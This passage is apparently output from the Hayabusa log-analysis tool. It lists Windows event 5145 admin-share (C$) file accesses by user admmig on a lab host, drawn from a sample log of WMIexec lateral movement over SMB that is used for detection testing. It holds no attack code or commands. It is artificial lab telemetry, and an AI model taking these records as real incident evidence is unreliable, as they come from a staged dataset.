0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 
0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 
